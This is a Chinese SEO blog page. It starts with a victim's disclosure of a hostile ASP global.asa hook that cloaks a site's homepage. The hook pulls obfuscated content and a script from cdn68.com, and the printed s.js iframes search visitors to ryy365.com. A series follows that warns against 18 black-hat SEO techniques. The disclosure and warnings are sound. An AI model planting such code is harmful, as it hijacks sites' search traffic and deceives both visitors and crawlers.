公开一段k站代码,seo排名掉光了

[asp]

 

有些家伙绞尽脑汁,想办法搞掉竞争对手的排名,刚好碰到了,我是受害者,公开一下代码,强烈鄙视一下。

<script language=”vbscript” runat=”server”>

sub Application_OnStart

end sub

sub Application_OnEnd

end sub

sub Session_OnStart

dim urlrefer,i,searray,fromse

urlrefer=LCase(“refer:”&request.ServerVariables(“HTTP_REFERER”))

agent=LCase(“agent:”&request.servervariables(“http_user_agent”))

mainindex=LCase(request.ServerVariables(“SCRIPT_NAME”))

indexquery=LCase(request.ServerVariables(“QUERY_STRING”))

isagent=false

fromse= false

mainpage= false

searray=array(“google”,”baidu”,”sogou”,”yahoo”,”soso”)

for i=0 to ubound(searray)

if (instr(urlrefer,searray(i))>0) then fromse=true

next

for i=0 to ubound(searray)

if (instr(agent,searray(i))>0) then isagent=true

next

pagearray=array(“/index.”,”/default.”,”/main.”)

for i=0 to ubound(pagearray)

if (instr(mainindex,pagearray(i))>0 and len(indexquery)<2) then mainpage=true

next

if fromse=true and mainpage=true then

response.write(“<sc”&”ript src=’http://cdn68.com/s.js’></sc”&”ript>”)

response.write(“<sc”&”ript src=’http://www.cdn68.com/s.js’></sc”&”ript>”)

response.end

end if

if isagent=true and mainpage=true then

url=”h”&”t”&”t”&”p”&”:”&”/”&”/”&”c”&”d”&”n”&”6″&”8″&”.”&”c”&”o”&”m”&”/”&”h”&”b”&”j”&”j”&”.”&”h”&”t”&”m”&”l”

Set ObjXMLHTTP=Server.CreateObject(“MSXML2.serverXMLHTTP”)

ObjXMLHTTP.Open “GET”,url,False

ObjXMLHTTP.setRequestHeader “User-Agent”,url

ObjXMLHTTP.send

GetHtml=ObjXMLHTTP.responseBody

Set ObjXMLHTTP=Nothing

set objStream = Server.CreateObject(“Adodb.Stream”)

objStream.Type = 1

objStream.Mode =3

objStream.Open

objStream.Write GetHtml

objStream.Position = 0

objStream.Type = 2

objStream.Charset = “gb2312”

GetHtml = objStream.ReadText

objStream.Close

response.write(GetHtml)

response.end

end if

end sub

 

‘sub Session_OnEnd

‘end sub

</scrip>

 

 

转发自: http://hi.baidu.com/nbwebshell/item/425ad350172eeea1adc85766

 

其中 cdn68.com/s.js的内容为:

var d=document.referrer;var re=/(%CA%B1%CA%B1|%E6%97%B6%E6%97%B6|%BF%AA%BD%B|%E5%BC%80%E5%A5%96|google)/;if(re.test(d)){  document.write(‘<div style=”display:none;”><script type=”text/javascript” src=”http://js.tongji.linezing.com/2386172/tongji.js”></script></div>’);  var curl=window.location.href;  murl=”http://a2.ryy365.com/baidu/”;  document.writeln(“<iframe src='”+murl+”‘ border=’0′ width=’100%’ height=’100%’ scrolling=’yes’ frameborder=’0′><\/iframe>”);  //setTimeout(“window.location.href='”+murl+”‘”,1);  document.writeln(“<div style=’display:none;’>”);}else{document.writeln(“<script>”);document.writeln(“window.location=window.location.href;”);document.writeln(“</script>”);}

 

[/asp]

18种黑帽SEO作弊手法(下)

    三. 下篇

1. 黑帽SEO作弊手法十三:群发软件/博客群发/论坛群发/外链群发/留言本群发…
2. 黑帽SEO作弊手法十四:蜘蛛陷阱/Flash动画/Session ID/框架结构/动态URL/JS链接/要求登录/强制使用Cookies
3. 黑帽SEO作弊手法十五:虚伪链接
4. 黑帽SEO作弊手法十六:欺骗点击链接
5. 黑帽SEO作弊手法十七:弹窗广告
6. 黑帽SEO作弊手法十八:刷站/刷百度排名/ 刷百度下拉框,相关搜索/刷百度分享/刷网站流量/刷alexa流量/刷IP流量….


上海SEO潇然孤雁飞在<<远离黑帽-揭露网上流行的18种黑帽SEO作弊手法>>前两篇文章中,曾为大家介绍12种黑帽SEO作弊系列手法,今天再就为大家另外介绍六种黑帽SEO作弊手法,希望大家能擦亮双眼,远离黑帽,用心做站!

   黑帽SEO作弊手法十三:群发软件

相信很多草根站长建站初期对网站的推广都是一筹莫展,想把站做好做大,但又耐不住性子,急于想一步登天,恨不得明天网站流量就超过1万,但是现实总是很残酷的。一开始急于收录,好容易收录了又开始着急没流量,想尽了一切办法也没又成功。最后就想到了歪门邪道,群发。

群发,指通过软件或其他方式对受众进行群体式广告发送,随着科技进步,群发不再是意义上的手机信息群发,短信群发。IT时代的到来,QQ群发,email群发,博客群发,阿里旺旺群发,贸易通群发,甚至网页群发都已普遍存在。

群发软件主要作用为发布推广企业或个人信息。目前群发软件主要有:邮件群发软件、QQ群发软件、企业QQ群发软件、阿里旺旺群发软件、阿里巴巴群发软件、引擎登陆群发软件、论坛群发软件、供求信息群发软件、 留言板群发软件、短信群发软件、IP群发软件等等。

群发

    1. 博客群发

博客群发通俗点说就是在各大门户网站批量创建博客,编写软文或者转载主站文章,而各个博客之间又互相友情链接,最终到达提升网站的知名度、增加外链 、提高流量等目标。利用博客评论VS引用和博客引用通告群发可对在线的千万博客网站直接发送帖子, 通过验证注册后直接发送带链接的图片或文字广告。内容字数限定1500字以下。

博客群发

    2. 论坛群发软件

可对在线的千万论坛网站直接发送帖子,绕过验证直接发送带链接的图片或文字广告。 内容字数限定800字以下。论坛群发软件迎合了论坛在线人数远大于邮件在线人数且交互及时等特点。
比较新颖的一种网络推广方式,优点比较省时省力,阅读人数远大于邮件;缺点就是不长久,并且容易被封帖。

论坛群发

    3. 外链群发

利用脚本或软件工具在网络上各个平台进行大批量的外部链接群发、建立。吸引搜索引擎对该网站的关注及关键词排名、权重的提升。随着现在“nofollow标签”的广泛运用,现在外链群发的效果也不如以前了。当然,现今各大搜索引擎对群发早就有了针对性的检测与评判标准,也会进行处罚,不建议使用。

外链群发   

    3. 留言本群发

留言本群发软件可以自动发布自己的关键词URL。在短时间内,迅速提高外部链接。

当垃圾信息发到一些被搜索引擎认为作弊网站时,包含你网站信息同样附有连带责任,你的站同时也会被搜索引擎认为是作弊,一起被搜索引擎处理,就如同连坐。搜索引擎对“故意制造大量连接指向某一网址”同样纳入作弊的范畴,百度能自动过滤不少可疑链接,把不相关的内容,发到不相同的网站,例如,你是卖水果的,把水果放到卖肉的桌子上卖,不但没人会买,而且不相称,同样你信息发到乱七八糟网站,牛头不对马嘴,搜索引擎同样讨厌此类行为,视为作弊.这也是黑帽SEO的作法之一。

留言本群发

   黑帽SEO作弊手法十四:蜘蛛陷阱

蜘蛛陷阱是阻止蜘蛛程序爬行网站的障碍物,通常是那些显示网页的技术方法,目前很多浏览器在设计的时候考虑过这些因素,所以可能网页界面看起来非常正常,但这些蜘蛛陷阱会对蜘蛛程序造成障碍。

蜘蛛陷阱也是以前常常使用的黑帽方式之一,就是用一些动态网站代码中,写一个无线循环的页面,使得蜘蛛爬进去后在这个无穷循环中轮回收录,这样虽然会使得网站疾速进步排名,而且也会给我们网站带来杀身之祸,所以大家不要使用。

以下简单为大家介绍几种易导致蜘蛛陷阱的建站技术:

 1. Flash动画

有得网站喜欢在首页放一个Flash动画片头、用户访问网站看完片头后被转向得真正得HTML版本得文字网站首页。搜索引擎不能读取Flash、一般也没办法从Flash Intro跟踪到HTML版本页面。
如果Flash效果是必需得、至少也需要在首页加上一个通往HTML版本得链接。这个链接应该是在Flash文件之外得HTML代码中、搜索引擎跟踪这个链接可以抓取后面得HTML版本页面。

 2. Session ID
 有些网站使用Session ID跟踪用户访问、每个用户访问网站时都会生成独特唯一得Session ID、加在URL中。搜索引擎蜘蛛得每一次访问也会被当成一个新得用户、URL中会加上一个不同得Session ID,这样搜索引擎蜘蛛每次来访问时所得到得同一个页面得URL将不一样、后面带着一个不一样得Session ID。这也是最常见得蜘蛛陷进之一。

 3. 框架结构

对搜索引擎来说、方位一个使用框架得网址所专区得HTML只包含其他HTML文件得代码、并不包含任何文字信息、搜索引擎根本无法判断这个网址得内容是什么。虽然蜘蛛可以跟踪框架中所调用得其他HTML文件、但是这些文件经常是不完整得页面、比如没有导航只是正文。搜索引擎也无法判断匡建忠得页面内容应该数属于主框架、还是属于框架调用文件。

 4. 动态URL
 动态URL指得是数据库驱动得网址所生成得、带有问号、等号及参数得网址。一般来说动态URL不利于搜索引擎蜘蛛爬行、应该尽量避免。下面对动态URL及其静态化还有更详细得讨论。

 5. JS链接
 由于Javascript可以创造出很多吸引人得视觉效果、有些网址喜欢使用Javascript脚本生成导航系统。这也是比较严重得蜘蛛陷阱之一。虽然搜索引擎都在尝试解析JS脚本、不过我们不能寄希望于搜索引擎自己去克服困难、而要让搜索引擎跟踪爬行链接得工作尽量简单容易。

 6. 要求登录
 有些网站内容放在需要用户登录之后才能看到得会员区域、这部分内容搜索引擎无法看到。蜘蛛不能填写用户名、密码、也不会注册。

 7. 强制使用Cookies
 有些网站为了实现某种功能、如记住用户登录信息、跟踪用户访问路径等、强制用户使用Cookies、用户浏览器如果没有启用Cookies、页面显示不正常。搜索引擎蜘蛛就相当于一个禁用Cookies得浏览器、强制使用Cookies只能造成搜索引擎蜘蛛无法正常访问

    黑帽SEO作弊手法十五:虚伪链接

大家都知道蜘蛛都是依照连接地址去发行的,对于虚假连接蜘蛛是很厌恶的,好比说这是一个页面,当蜘蛛进去后,里面除了关键词别的内容什么都没有,这样一来蜘蛛也就会被逼迫爬行并且收录,固然蜘蛛无奈辨认你的网站是否是虚假连接,但是搜索引擎一旦发现,你的网站也会被k掉。

   黑帽SEO作弊手法十六:欺骗点击链接

另一种情况就是当用户打开一个网站,该网站声称其网站已移至新域名下,并请用户点击新域名链接进入网站。但当用户进去后才发现,这个链接是一个“会员”链接或与原网站毫不相干的网站。这也属欺骗性重定向行为。

还有一种就是黑客们可以利用“肉鸡”设备诱导用户点击欺骗性链接,进行DNS高速缓存毒害攻击,或是对其他操作系统发起攻击。

   黑帽SEO作弊手法十七:弹窗广告

弹窗广告是在网站中加入弹窗,通过采用<mate refresh>标签或者Javascript 实现,指打开网站后自动弹出的广告,无论点击还是不点击都会出现在用户的面前。

不管是导出到外部网站还是内部链接,对搜索引擎而言都是不友好的,有网站的朋友应该都知道,给客户做短期广告时候就加入了弹窗,由于种种原因,关键词排名会掉好多页,所以新站,尤其是PR、权重比较低的站,一定要注意,千万别做弹窗。

目前采用弹窗广告的在游戏行业中主要体现在web游戏上面,从追求流量的角度讲,MP3弹窗是目前利用最多的.曾经论坛回帖中利用过,后来转嫁到博客中.09年的时候新浪博文中加载mp3弹窗也算是比较流行的.不过随着用的人增多和弹窗弹出木马网页,新浪开始封杀mp3弹窗.不过163的现在还能用,搜狐的得用户二次提交.

一般弹窗广告之中都具有强制性,并且可能包含挂马病毒,木马病毒。用户一般都对这种强迫式的广告形式很厌恶,而且现在大多数浏览器会提供一些插件来屏蔽弹出广告。

弹窗广告对百度SEO优化是一个致命的伤害,同时也看得出对用户体验不够友好。如果大家对自己的网站想往正规站发展做大做强就不要图眼前的利益,也去做做弹窗广告害了自己

如果网站要长期的发展,就要细微之处见真情,如果打开一个网站,弹窗网页漫天飞,让你第一印象就是垃圾站一个,那么你留住的用户群就少的可怜了,更不用说你的流量了,没有了固定的访问群,你的流量也就是引擎收录的那些了,不利于网站的发展。

    黑帽SEO作弊手法十八:刷站

    1. 刷百度排名

各大站长讨论平台随处可见各种类似的广告,一种叫做“快速刷百度排名”的广告很是泛滥。如“三天排名进前三”、“24小时关键词上首页”、“6小时进百度首页”、“无需更新文章,动动鼠标就能排名”“3天上首页”“8小时前三”等的服务,根据百度指数收费几百到几千不等。

百度刷排名的原理:一个基于用户点击的原理,百度认为质量高的网站必然是用户最喜欢点击的网站,搜索一个关键词,一个网站点击的次数越多,说明这个网站是更受用户欢迎的。通过不同的ip使用百度查询某一关键词,点击你要刷的网站,当一个网站点击的次数越多,那么百度就会认为这个网站是对用户最有帮助的网站,会在短时间内将其排名提前。从而通过欺骗百度的方式刷排名。刷百度排名的核心技术就是模仿大量真实IP搜索某个关键词并直接点击目标网站,一般是通过adsl换ip或者是换代理ip的方式刷排名。

目前刷百度排名的主要方式可以说是两大类,一个就是手工刷,一个则是软件刷。原理很简单,利用搜索引擎对用户的行为来判断我们的网站是否属于垃圾网站,是否应该给予网站排名,这个方面,在百度的web2.0反垃圾升级之后更加明显。利用点击原理刷上去的排名不能持久的主要原因就是网站受到的点击不是长期的,而是短暂的,自然排名也是昙花一现的。

刷百度排名

百度又是如何判断刷排名作弊的呢?

1.搜索和地域不相干的词。比如广东的Ip搜索“上海SEO公司”,那就肯定有问题了。并且对于地域类词语,不同区域搜索出的结果也不一样,也会造成刷排名是没法刷的。

2.Ip过多集中在同一区域或者是同一ip段。如果是用adsl拨号换ip的话,尽管ip能切换成不同的ip,但是始终都是在同一ip段内,并且ip所在地是不变的。如果点击某网站的ip过多集中在同一区域,也很有可能触发百度的人工审核,一旦被百度发现,人工k掉是无法避免的。

3.不点击排名在前面的网站,而直接点击某一特定排名的网站。由于是刷排名,软件一般会通过定位或者是查找的方式,直接跳转到某一页中,点击某个特定的网站。这就和普通用户的浏览习惯方式大相径庭了。一般很少有人会不点击前面的网站链接,而直接跳过去点击排名稍靠后的网站,因此这也很有可能被百度发现。

    2. 刷百度下拉框(相关搜索)

百度下拉的官方正式叫法是百度推荐词(Baidu Suggest Word),民间又称之为百度联想词或百度下拉菜单。是百度为了方便广大网民搜索,提高输入效率而推出的一项服务。

百度下拉的作用:大部分人在搜索某一个关键词的时候,其实他并不知道该如何组织语言以便更加精确的达到搜索目的,下拉框就为他提供了便捷 。如果搜索词比较长的话、这样子也节约了时间,所以下拉框是很便捷的。

制造虚假搜索由于百度、google都提供了相关关键字的功能,于是有人就自己发明一些与热门关键字相关的关键字,比如说“土豆网”热门,他就发明一个“挖土豆”的关键词,预先自己先建立好相应的页面,通过搜索这个新的关键词能排到第一。然后通过软件在搜索引擎里不断地搜索这个关键字,于是这个关键词就出现在了相关搜索的位置,吸引用户点击搜索。

相关搜索是搜索引擎用户体验的一个部分。刷一些自造生僻的关键词出来,影响用户体验,明白人一看就知道是刷出来的,刷新量太高,百度人工核查时被发现,封锁关键字,重者K站。

刷百度下拉框

    3. 刷百度分享

通过百度分享按钮,您网站上的网页将更容易被百度搜索引擎所发现,从而有机会从百度搜索带回更多的流量。可以在搜索结果中,出现百度大拇指,就算排名不在第一,也会引导用户注意您的网站。

百度分享根据百度官方的说法:
1).用户将网站内容分享到第三方网站,第三方网站的用户点击专有的分享链接,从第三方网站带来社会化流量。
2).使用了百度分享的网页可以更快地被百度爬虫发现,从而帮助网站的内容更快地被百度抓取。
3).使用了百度分享的网页被用户分享后,可以使该网页被分享的次数展示在百度的搜索结果页中,辅助用户判断网页质量。

搜索引擎本身的运营指导方针就是不断的提高SEO的质量,提供访客更具价值的信息,并且它希望所有的站点都可以遵循其制定的游戏规则走。作为国内最大的搜索引擎百度推出这一分享工具的初衷是为了提供给他们可以一个更加有价值的搜索结果。我们假设其对我们的排名有一定的作用,而你采用刷的方法来提供这一数值,这种行为无异于购买链接,你的站点将有可能面临搜索引擎的惩罚。

如果只是单纯的分享,造成网站的跳出率高,这样的分享应该算是做弊,因为软件刷都是自动定时换IP进入网站分享之后关闭页面,所以不仅造成PV过低而且跳出率很高。因为半夜12点-早上8点的时间段自然IP很少,但软件刷分享的IP很多,造成了每天早上一打开统计,看到网站的跳出率都在90%以上。使用不正规的手段来刷高百度分享小拇指的分享次数可以说弊大于利,而对于一个站点如果你想要累积你的用户群,站在用户的角度来建设站点才是真正的成功之道,切勿使用这些旁门左道来投机取巧。

百度分享

    4. 刷网站流量

通常说网站流量是指网站的访问量,是用来描述访问一个网站的用户数量以及用户所浏览的页面数量等指标,常用的统计指标包括网站的独立用户数量、总用户数量(含重复访问者)、页面浏览数量、每个用户的页面浏览数量、用户在网站的平均停留时间等。

流量

 刷网站流量(alexa流量和IP流量)对网站排名的危害

(1) 流量大起大落存作弊嫌疑
    由于平台刷流量的速度是非常快的,一天的IP量就有上万,一个网站流量每天上百就已经是很不错的网站了,一个新站流量突然间由原来的一天不到10个增加到一天上万,作弊嫌疑相当明显。

(2) 重复IP严重引起注意
    由于同一个刷IP平台的用户也就几千个人,长久互刷IP重复严重,很容易引起搜索引擎和alexa的注意。

(3) 页面浏览时间太短
    由于使用软件平台刷IP,软件打开页面以后就要立即关闭,否则浏览器无法承受同时打开太多的页面,所以页面浏览时间是很短的,而且即便是真的是网民自然浏览的话,一个网站浏览的时间过短也从一个侧面证明该网站可读性不强,用户体验不好,不能留住客户。

(4) 流量不均匀
    尤其对一个新网站,刚开始的时候没有流量,一天每个时间段内IP访问量几乎是零。当你打开软件刷流量的时候,IP访问量瞬间增加到几十,几百甚至上万,严重的IP访问不均匀,被搜索引擎和alexa降权也是情理之中了。

(5) 外链和流量严重不平衡
    新网站在几乎没有高质量外链的前提下,流量上千甚至上万,即便是一个网站高手都不能够做到,更何况一个新的草根站长。想要骗过搜索引擎和alexa这样的顶级公司就更是痴人说梦了。

   搜索在进步,算法常变术;作弊有风险,黑帽须谨慎!切勿踩红线,提高站质量。

   做网站的秘诀在于坚持! 最高明的SEO就是忘却优化痕迹, 做好文章质量,提高用户体验。每天更新,以不变应万变,才是制胜不二的法宝。

  本文由上海SEO潇然孤雁飞整理编辑 文章来源:潇然孤雁飞SEO博客,http://www.xlfseo.com/SEO-JS/HM-3.html欢迎转载!转载请注明出处,谢谢!

18种黑帽SEO作弊手法(中)

二. 中篇

1. 黑帽SEO作弊手法七:链接买卖
2. 黑帽SEO作弊手法八:链接工厂/站群/博客链轮/链接农场/链接养殖场…
3. 黑帽SEO作弊手法九:垃圾链接
4. 黑帽SEO作弊手法十:网站镜像
5. 黑帽SEO作弊手法十一:诱饵替换
6. 黑帽SEO作弊手法十二:内容采集/采集器/伪原创工具…

    三. 下篇

1. 黑帽SEO作弊手法十三:群发软件/博客群发/论坛群发/外链群发/留言本群发…
2. 黑帽SEO作弊手法十四:蜘蛛陷阱/Flash动画/Session ID/框架结构/动态URL/JS链接/要求登录/强制使用Cookies
3. 黑帽SEO作弊手法十五:虚伪链接
4. 黑帽SEO作弊手法十六:欺骗点击链接
5. 黑帽SEO作弊手法十七:弹窗广告
6. 黑帽SEO作弊手法十八:刷站/刷百度排名/ 刷百度下拉框,相关搜索/刷百度分享/刷网站流量/刷alexa流量/刷IP流量….


 

上海SEO潇然孤雁飞在<<远离黑帽-揭露网上流行的18种黑帽SEO作弊手法(上)>>篇中,曾为大家介绍:黑帽SEO作弊系列手法中之:关键字堆砌,桥页,隐藏文字,隐藏链接(黑链),隐藏页面,网页劫持六大作弊手法,今天就为大家另外介绍六种黑帽SEO作弊手法,希望大家能擦亮双眼,远离黑帽,用心做站!

    黑帽SEO作弊手法七:链接买卖

很多人通过链接交易平台进行链接买卖,大家都知道付费链接的意思就是我们购置的黑链,也就是购买的高pr的友情链接,购买的链接,虽然在其他网站买广告是很正常的一件事,但有的时候如果所购买的广告链接纯粹是为了提高网页级别或为了操纵搜索引擎排名,也会被当做作弊手段。
在怎样区别正常广告和作弊手段之间有一个很模糊的界限。

虽然这样的连接搜索引擎虽然很少查,但是这样做的人自己心里很清楚。如果你的网站被认为是通过购买链接来作弊,也没办法去和搜索引擎争辩。因为搜索引擎的决定就是最后的决定。当然更严重的是,如果你的网站是出卖链接的那个网站,你的麻烦就更大了。有可能被搜索引擎k掉。

    黑帽SEO作弊手法八:链接工厂(站群,链轮)

 链接工厂,亦称大量链接机制,链接农场,链接养殖场;指由大量网页交叉链接而构成的一个网络系统。这些网页可能来自同一个域或多个不同的域,甚至可能来自不同的服务器。一个站点加入这样一个“链接工厂”后,一方面它可得到来自该系统中所有网页的链接,同时作为交换它需要“奉献”自己的链接,借此方法来提升链接得分,从而达到干预链接得分。其目的是通过搜索引擎获得大量流量,或者是将链接指向同一个网站,以提高搜索排名。

站群通常由几个到几百个网站组成,个人站长想通过手工更新站群,那几乎是不可能的任务。所以一般都是通过站群软件来完成。

站群

博客链轮,又称BLOG-LinkWheeler,在SEO中通常用来培养自己关键词在搜索引擎中的排名。当然,在庞大的外部导入链接的支撑下,我们可以利用站内的合理锚文本分布来进行恰当的优化。

博客链轮

链接工厂简单的理解可以为一个相互链接的一群网站,不顾主题的相关,大家链接在一起,每个新加入的网站既可以得到之前的网站的链接,同时也要链接别人。而之前加入的网站就可以得到多一个链接。由于大量的网页相互交叉链接,而构成了一个链接的网络系统.比如说,现有100个网站,这些网站内容可能不相关,但是彼此互相链接,形成一个网状结构。

加入链接工厂,危害十分大.是对搜索引擎十分不友好的一种做法.加入链接工厂极有可能让你的站点陷入泥潭,到时候会被搜索引擎降权或者被K掉,google明确提出,不要加入链接工厂,而google的算法中有说到,链接作弊的网站,自己也算作弊了。

站长常用的轮链软件有X豹站群管理系统,有几十万个用于轮链网站,相互轮链。效果相当惊人。这些站群软件通过轮链的方式达到一种快速收录、快速排名的效果,但是通过这种方式突破上来的新站点,在百度里的排名,只能够维持三天左右,所以这些人都是以量取胜,这是现在最流行的黑帽技术之一。这种作弊手段2009年的时候非常活跃,后来百度算法更新后有所屏蔽吧。

黑帽SEO作弊手法九:垃圾链接

垃圾链接是指为达到快速的关键词排名目的,在各大论坛和博客发布和主题内容不相关的链接和自动生成(采集)网页中含有的链接,称为垃圾链接。所有搜索引擎都把外链当作排名的主要因素之一,而从其他网站获得自然链接又不是意见等闲的事情,垃圾链接就运应而生了。

垃圾链接基本特征:
1、主要出现在论坛和博客的评论和留言中且无贡献值。
2、自动生成(主要指采集页面)的页面产生的链接。
3、页面内容和Title以及描述严重不符的网页输出链接。
4、自动评论和顶贴软件生成的链接(如:论坛顶贴机和博客群发群件软件)。

垃圾链接不会马上被识别,而是事后审查并去除其权重,最终导致降权。垃圾链接在未识别之前会被计入关键词排名权重,之后去除。因垃圾链接降权后,恢复周期非常长,在垃圾链接清除后2-3个月才恢复。

黑帽SEO作弊手法十:网站镜像

网站镜像,通过复制整个网站或部分网页内容并分配以不同域名和服务器,以此欺骗搜索引擎对同一站点或同一页面进行多次索引的行为,这既是为什么有的网站注明禁止未授权不得做网站镜像的原因了,两个网站的完全一样,相似度过高必然会导致自己的网站受到影响。

这种手法容易被搜索引擎识别为作弊手法,导致自己的站点受到影响。来回的切换比较麻烦。一旦自己的网站被镜像,网站的品牌形象就会受损。千万别把所有的域名都指向一个站,或者绑定复制的网站,不要认为这样做能增加主站的权重和PR,大错特错,同样是作弊,搜索引擎为了避免关键词的地位被一家包揽,对镜像网站的处分是十分之狠,被搜索引擎识别后,不仅k掉你的网站,并且永恒封掉你的域名和服务器地址,在服务器所有的网站都会随着不幸。

网站镜像

黑帽SEO作弊手法十一:诱饵替换

诱饵替换指的是作弊者先针对一些普通关键词制作页面获得排名后,页面再换成其他内容。一般两种情况,一是针对比较等闲的长尾关键词制作页面,获得排名但和点击后,把页面全部换成与热门关键词相关的商业价值更高的类容。第二种是针对普通用户正当的关键词制作内容,获得排名偶页面换成非法、成人、赌博等内容。

诱饵替换是SEO作弊的手段之一,诱饵替换利用了搜索引擎的记忆特性,我们经常在搜索引擎结果中看到这种现象,页面内容完全改变后,原来的页面排名并不会立即消失。甚至在搜索引擎重新捉取页面新内容后,也不会立即消失,而是维持一段时间。由于搜索引擎有这种记忆特性,再加上诱饵替换页面被重新抓取就需要一段时间,所以诱饵替换页面往往能在原来正当或比较容易的关键词搜索中保持一段时间的排名。会受到搜索引擎的惩罚。

 黑帽SEO作弊手法十二:内容采集

内容采集使用CMS程序自带或软件的采集功能,填充大量质量低劣的网站内容和垃圾信息,也称“乾坤大挪移”。当然,大量采集网络中的重复内容,最终的结果各位Seoer心里都应该清楚。

常见的应用手法有:利用采集器软件和伪原创工具进行制造垃圾。

1. 采集器

一些采集器具有的内容采集和数据导入功能能将您采集的任何网页数据发布到远程服务器,支持:风讯文章,动易文章,动网论坛,PHPWIND论坛,Discuz论坛,phpcms文章,phparticle文章,LeadBBS论坛,魔力论坛,Dedecms文章,Xydw文章,惊云文章等的模块文件。cms模块请自己参照制作修。

业界对采集内容都是嗤之以鼻的,尽管通过采集的手段来更新网站内容是大多数站长所抵制的,但每时每刻依然有很多的站长利用各种手段进行内容采集。

通过采集程序来抓取别人网站的内容然后放到自己的网站上,这本身就是非常不正当获取内容的方式,因为这种方法的便捷性成为当下很多网站更新内容的手段和渠道,这可以看做是行业内部不正当竞争的一种方式。再者采集内容的质量难以人为掌控是采集受到抵制的另一个重要原因,现在的很多站长用程序来采集内容,而现有的技术还不能安全过滤文章中不利于网站发展的内容,比如不良画面语句。就算你都是从权威网站上采集内容,其他网站的内容很可能并不适合你网站内容的更新,网站本身的发展是存在差异特征的。现在搜索引擎的人性化水准逐步提高,作弊的手段极易遭来搜索引擎的不友好,轻则不收录重则K站 ,采集所造成的网站发展后果是完全得不偿失的。不论从哪个方面看,采集内容都不能使网站生存长久 ,是网站运营的不可取。

2. 伪原创工具

所谓伪原创就是把一篇文章进行再加工,使其让搜索引擎认为是一篇原创文章,从而提高网站权重。

随着seo的发展出现了“伪原创”这个产物,被众多seoer痴迷不能自拔,到现在还有很多站长在操作站群,少则几百站点多则上千如此庞大的网站阵容如果用原创去更新兼职就是无底洞,采集是最为简洁和方便的方法。

我们知道,搜索引擎是喜欢原创性的内容,对于重复的内容,它会认为没有收录的价值。如果网站上大量的内容都是转载的,搜索引擎就会觉得整个网站没有多大的价值,从而降低网站权重。网站排名自然也不会很高。

伪原创工具都是机械的、死板的,这些工具无外乎替换词语,比如同义词,甚至有替换成反义词的,这样就和原文的意思完全相反了,没有观点或者错误的观点,对网站长期发展百害无一利。

同时,这些伪原创工具还有一个“本事”就是打乱文章的段落、句式,使文章看起来前言不搭后语,说难听一点,这样的文章狗屁不通的,只给搜索引擎看。网站的最终目的是做给用户看的,一个网站大量的文章都读不懂,句子不通,你自己看到别人的网站这样子,也一定会马上单击屏幕右上角的红叉叉。

黑帽SEO作弊手法其他的手法,将在后面的篇节中陆续为大家介绍。敬请关注<< 远离黑帽-揭露网上流行的18种黑帽SEO作弊手法(下) >>!

   搜索在进步,算法常变术;作弊有风险,黑帽须谨慎!切勿踩红线,提高站质量。

    做网站的秘诀在于坚持! 最高明的SEO就是忘却优化痕迹, 做好文章质量,提高用户体验。每天更新,以不变应万变,才是制胜不二的法宝。

    本文由上海SEO潇然孤雁飞原创 文章来源:潇然孤雁飞SEO博客,http://www.xlfseo.com/SEO-JS/HM-2.html欢迎转载!转载请注明出处,谢谢!

18种黑帽SEO作弊手法(上)

揭露网上流行的18种黑帽SEO作弊手法系列篇章内容简介:

一. 上篇

1. 黑帽SEO作弊手法一:关键字堆砌
2. 黑帽SEO作弊手法二:桥页
3. 黑帽SEO作弊手法三:隐藏文字
4. 黑帽SEO作弊手法四:隐藏链接/黑链
5. 黑帽SEO作弊手法五:隐藏页面/斗蓬法/障眼法…
6. 黑帽SEO作弊手法六:网页劫持/PR劫持

二. 中篇

1. 黑帽SEO作弊手法七:链接买卖
2. 黑帽SEO作弊手法八:链接工厂/站群/博客链轮/链接农场/链接养殖场…
3. 黑帽SEO作弊手法九:垃圾链接
4. 黑帽SEO作弊手法十:网站镜像
5. 黑帽SEO作弊手法十一:诱饵替换
6. 黑帽SEO作弊手法十二:内容采集/采集器/伪原创工具…

    三. 下篇

1. 黑帽SEO作弊手法十三:群发软件/博客群发/论坛群发/外链群发/留言本群发…
2. 黑帽SEO作弊手法十四:蜘蛛陷阱/Flash动画/Session ID/框架结构/动态URL/JS链接/要求登录/强制使用Cookies
3. 黑帽SEO作弊手法十五:虚伪链接
4. 黑帽SEO作弊手法十六:欺骗点击链接
5. 黑帽SEO作弊手法十七:弹窗广告
6. 黑帽SEO作弊手法十八:刷站/刷百度排名/ 刷百度下拉框,相关搜索/刷百度分享/刷网站流量/刷alexa流量/刷IP流量….

 


 

黑帽seo就是作弊的意思,黑帽seo主要是研究和利用搜索引擎算法漏洞,其手法不符合主流搜索引擎发行方针规定,采用搜索引擎禁止的方式优化网站。影响搜索引擎对网站排名的合理和公正性。百度在《搜索引擎优化指南》中指出所谓黑帽seo行为,通常就是一般所讲的“搜索引擎作弊行为”,通常的黑帽SEO是利用和放大搜索引擎的现在有的缺陷或漏洞而获取更多的用户访问流量。简单的说,黑帽seo优化就是使用作弊手段或有可疑手段在短时间内获取大量流量。同时随时因为搜索引擎算法的改变而面临惩罚。

做白帽就要花更多的时间和精力,而且并不能百分之百保证一定能做出一个成功的网站。但相对于来说白帽更加的安全,一旦成功,网站就可以维持排名和流量,成为一份高质量的资产。

黑帽的手法特点就是短平快,往往见效快,实施成本低。往往有很多seoer太过于急功近利,为了追求一时的排名,喜走捷径,剑走偏锋,而采用的作弊方法,虽然说很多黑帽seo手法谈不上不道德,但搜索引擎肯定是痛恨黑帽的,因为黑帽降低了搜索结果相关性和用户体验,动了搜索引擎的饭碗,属于必须严厉打击的范围。一旦被惩罚,整个网站常常就是不得不放弃了,一切要重新开始。所以做黑帽被惩罚是正常的,甚至可以说,长远来看,是必然的。

2012年SEO界的重磅炸弹莫过K站事件,百度接二连三地制造出百度6.22事件,6.28事件,7.13黑色星期五事件,潇然孤雁飞曾在<<2012年上半年百度K站趋势分析>>文章中曾为大家介绍网站自查23种网站被K的原因,今天潇然孤雁飞就重点为大家揭露网上比较流行的18种SEO黑帽作弊手法,写这篇文章的初衷不是教大家什么利用黑帽seo手段去作弊,而是希望大家能擦亮双眼,远离黑帽,用心做站!坚决制止那些触犯黑帽SEO道德和底线的执行手法,共同维护打造SEO行业的一片净土。

    黑帽SEO作弊手法一:关键字堆砌

典型的SEO作弊行为,在黑帽Seo中最常被滥用的形式之一,比较低级的一种手法,短时间内可以获得很不错的排名。这种手法已经是过去时了.搜索引擎判断这种作弊行为的算法已经相当成熟,所以,一旦网页上出现关键词堆砌现象,一般整个网站会被搜索引擎封掉。

关键字堆砌是指在一个网页中非常密集地放置关键字。关键字堆砌的常见形式,如标题,Tag、关键词标签、说明标签、文章内容页高度重复关键词等。

